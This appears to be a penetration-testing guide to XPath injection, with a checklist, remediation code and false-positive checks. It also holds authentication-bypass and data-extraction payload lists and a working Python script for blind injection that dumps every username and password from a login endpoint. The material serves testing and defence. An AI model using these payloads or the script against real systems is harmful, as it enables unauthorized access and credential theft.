Exploitation A03

XPath Injection

XPath injection targets applications that build XPath queries from user input, typically against XML data stores or XML-backed authentication. By manipulating the query, an attacker can bypass authentication or read data they should not see. Unlike most SQL databases, XPath has no access-control model: a successful injection can usually reach any node in the XML document being queried.

Authentication Bypass

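XPath authentication queries typically follow the pattern //user[username='INPUT' and password='INPUT']. Injecting a tautology (an always-true condition) makes the predicate match every user node, which bypasses authentication in the same way as classic SQL injection. XPath 1.0 has no comment syntax, so the payload must leave the remainder of the query syntactically valid rather than commenting it out.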
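
To make the mechanism concrete, here is a minimal sketch of how a concatenated query changes shape under a tautology payload. The function name build_login_query is hypothetical and stands in for whatever code the application actually uses. No XPath engine is involved; the snippet only prints the resulting query strings.

```python
def build_login_query(username: str, password: str) -> str:
    """Hypothetical vulnerable builder: user input is concatenated into the query."""
    return f"//user[username='{username}' and password='{password}']"


# Benign input stays inside the two string literals.
benign = build_login_query("alice", "s3cret")
print(benign)

# A tautology payload closes the literal and adds its own boolean logic.
injected = build_login_query("' or '1'='1", "' or '1'='1")
print(injected)
```

Because and binds more tightly than or in XPath, the injected predicate groups as username='' or ('1'='1' and password='') or '1'='1', which is true for every user node.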

xpath-auth-bypass-payloads.txt
text
# Each pair below is a username payload followed by a password payload:

' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']

admin' or '1'='1' or '1'='1
anything

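# Closes the predicate early; the leftover "and password=..." usually triggers
# a syntax error, which confirms injection but rarely bypasses login on its own.
admin']
anything

' or 1=1 or ''='
' or 1=1 or ''='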

Data Extraction

Because every node in the document is reachable from an injected expression, XPath functions such as name(), substring(), count(), string-length(), and contains() can be used to enumerate the XML structure and extract values one boolean test at a time.

xpath-data-extraction-payloads.txt
text
# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b

# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b

# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b

# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b

# Content search:
' or contains(//user[1]/password,'admin') or 'a'='b

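Blind XPath Injection

When the application never echoes query results and only behaves differently for a true or a false predicate, data can still be recovered by asking a series of yes/no questions and observing which response comes back.
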
python
import requests
import string

url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"

def xpath_blind(query):
    payload = f"' or {query} or 'a'='b"
    resp = requests.post(url, data={
        'username': payload,
        'password': 'x'
    })
    return 'Welcome' in resp.text  # True condition indicator

# Count users (store the result for the extraction loop below):
user_count = 0
for i in range(1, 50):
    if xpath_blind(f'count(//user)={i}'):
        user_count = i
        print(f'[+] Found {i} users')
        break

# Extract a string value character by character:
def extract_string(xpath_expr, max_len=50):
    result = ''
    for pos in range(1, max_len + 1):
        found = False
        for char in charset:
            if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
                result += char
                print(f'[+] {xpath_expr}: {result}')
                found = True
                break
        if not found:
            # End of string, or a character outside charset
            break
    return result

# Extract all usernames and passwords:
for i in range(1, user_count + 1):
    username = extract_string(f'//user[{i}]/username')
    password = extract_string(f'//user[{i}]/password')
    print(f'User {i}: {username}:{password}')
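
One limitation of the loop above is that it cannot tell the end of a string apart from a character that is missing from charset. A possible refinement, sketched below, asks for string-length() first and then fills every position. The names extract_with_length and make_fake_oracle are hypothetical; the fake oracle is a local stand-in so the sketch runs without a target, and in practice the oracle would be a function like xpath_blind.

```python
import re
import string
from typing import Callable

CHARSET = string.ascii_letters + string.digits + "@._-"


def extract_with_length(oracle: Callable[[str], bool], xpath_expr: str,
                        max_len: int = 64) -> str:
    """Recover the string value of xpath_expr using only true/false answers."""
    # Step 1: find the exact length, so the loop knows when it is done.
    length = next(
        (n for n in range(max_len + 1)
         if oracle(f"string-length({xpath_expr})={n}")),
        None,
    )
    if length is None:
        raise ValueError(f"value is longer than max_len={max_len}")

    # Step 2: test each position against the charset.
    chars = []
    for pos in range(1, length + 1):
        match = next(
            (c for c in CHARSET
             if oracle(f"substring({xpath_expr},{pos},1)='{c}'")),
            "?",  # placeholder for a character outside CHARSET
        )
        chars.append(match)
    return "".join(chars)


def make_fake_oracle(secret: str) -> Callable[[str], bool]:
    """Local stand-in for a target; understands only the two query shapes above."""
    def oracle(condition: str) -> bool:
        m = re.fullmatch(r"string-length\(.+\)=(\d+)", condition)
        if m:
            return len(secret) == int(m.group(1))
        m = re.fullmatch(r"substring\(.+,(\d+),1\)='(.)'", condition)
        if m:
            pos = int(m.group(1))
            return secret[pos - 1:pos] == m.group(2)
        raise ValueError(f"unsupported condition: {condition}")
    return oracle


recovered = extract_with_length(make_fake_oracle("j.doe#1"), "//user[1]/username")
print(recovered)  # j.doe?1  ('#' is not in CHARSET, so it is shown as '?')
```

A "?" in the output signals that the charset needs widening for that position, rather than silently truncating the value.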

Testing Checklist

  1. Identify potential XPath entry points (login forms, search, XML-backed APIs)
  2. Test for errors with single quotes: ' in input fields
  3. Test authentication bypass with classic XPath tautologies
  4. Test blind extraction using substring() and boolean conditions
  5. Enumerate XML structure with name() and count()
  6. Test for XPath 2.0 functions if available

Evidence Collection

Injection Proof: Request/response showing authentication bypass or data extraction

Data Extracted: Usernames, structure — redact passwords in report

CVSS Range: Auth bypass: 8.1–9.8 | Data extraction: 7.5–8.6

Remediation

  • Parameterized XPath: Use parameterized/precompiled XPath queries instead of string concatenation.
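  • Input validation: Validate input against an allowlist where possible, and otherwise reject or safely encode special characters: ' " [ ] / @ = *. XPath 1.0 string literals have no escape sequence, so a value containing both quote types has to be built with concat().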
  • Migrate to database: Consider migrating from XML data stores to a proper database with access controls.
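
The first two items can be sketched with the standard library alone. The allowlist pattern and the names is_valid_username and xpath_literal are assumptions for illustration, not part of any particular framework; the right character set and length limit depend on the application.

```python
import re

# Assumed policy: usernames are 1-64 characters from a small allowlist.
USERNAME_RE = re.compile(r"[A-Za-z0-9@._-]{1,64}")


def is_valid_username(value: str) -> bool:
    """Allowlist check: accept only characters that cannot alter query structure."""
    return USERNAME_RE.fullmatch(value) is not None


def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 expression that evaluates to exactly `value`.

    XPath 1.0 string literals have no escape sequences, so a value that
    contains both quote characters is assembled with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    # Re-join the pieces with a double-quoted single quote between them.
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


payload = "' or '1'='1"
print(is_valid_username(payload))                      # False
print(f"//user[username={xpath_literal(payload)}]")    # payload stays one literal
print(xpath_literal("a'b\"c"))                         # concat('a', "'", 'b"c')
```

Where the XPath library supports variable binding, that is usually preferable to encoding values by hand. lxml, for instance, accepts variables as keyword arguments, as in root.xpath("//user[username=$u]", u=value).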

False Positive Identification

  • XML parsing error ≠ injection: An XML/XPath error in the response indicates input reaches the query, but confirm you can extract data or bypass logic before classifying as exploitable injection.
  • Limited data in XML store: XPath injection in a config file with no sensitive data may be low impact — assess what data the XML document contains.
  • Framework protections: Some libraries bind user input as XPath variables instead of concatenating it. Verify that the injection actually changes the query structure rather than passing through as literal text.
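
One way to apply these checks is a differential test: compare the response for a true condition, a false condition, and a plain invalid value. The sketch below assumes responses are deterministic (no timestamps or tokens in the body) and that send is a hypothetical callable which submits a payload in the suspect parameter and returns the response body. The three fake targets exist only to show the expected outcomes.

```python
from typing import Callable


def confirm_boolean_injection(send: Callable[[str], str]) -> bool:
    """Return True only if the payloads change application logic, not just raise errors."""
    baseline = send("no-such-user")
    when_true = send("' or '1'='1' or 'a'='b")
    when_false = send("' or '1'='2' or 'a'='b")
    # A false condition should look like a normal failure; a true one should not.
    return when_false == baseline and when_true != baseline


# Fake targets for illustration only.
def vulnerable(payload: str) -> str:
    return "Welcome" if "'1'='1'" in payload else "Login failed"


def parameterized(payload: str) -> str:
    return "Login failed"  # input is treated as literal text


def error_only(payload: str) -> str:
    return "XPath error" if "'" in payload else "Login failed"


print(confirm_boolean_injection(vulnerable))     # True
print(confirm_boolean_injection(parameterized))  # False
print(confirm_boolean_injection(error_only))     # False: an error alone is not proof
```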